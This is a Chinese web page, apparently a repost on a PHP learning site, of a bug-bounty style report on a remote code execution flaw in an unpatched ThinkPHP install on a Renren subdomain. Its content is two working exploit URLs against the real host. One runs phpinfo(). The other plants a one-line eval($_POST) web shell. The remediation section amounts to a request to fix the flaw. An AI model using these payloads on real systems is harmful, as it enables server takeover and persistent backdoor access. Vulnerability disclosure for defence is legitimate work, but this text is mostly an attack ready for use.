网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

人人网某分站远程代码执行(已Shell) - 网站安全

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 1 人人某个分站由于使用Think php的框架并且未修复其远程代码执行漏洞导致存在该漏洞,利用该漏洞可直接执行PHP代码:http: innovator renren com index php module action param1 $%7B@phpinfo()%7D 2 直接...

#1.人人某个分站由于使用Think php的框架并且未修复其远程代码执行漏洞导致存在该漏洞,利用该漏洞可直接执行PHP代码:
 
http://innovator.renren.com/index.php/module/action/param1/$%7B@phpinfo()%7D
 
 

 
#2.直接构造一句话:
 
http://innovator.renren.com/index.php/module/action/param1/%7B$%7Beval($_POST[u])%7D%7D
 
修复方案:
仅做了漏洞证明,请修复漏洞,只求20rank!不谢!

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论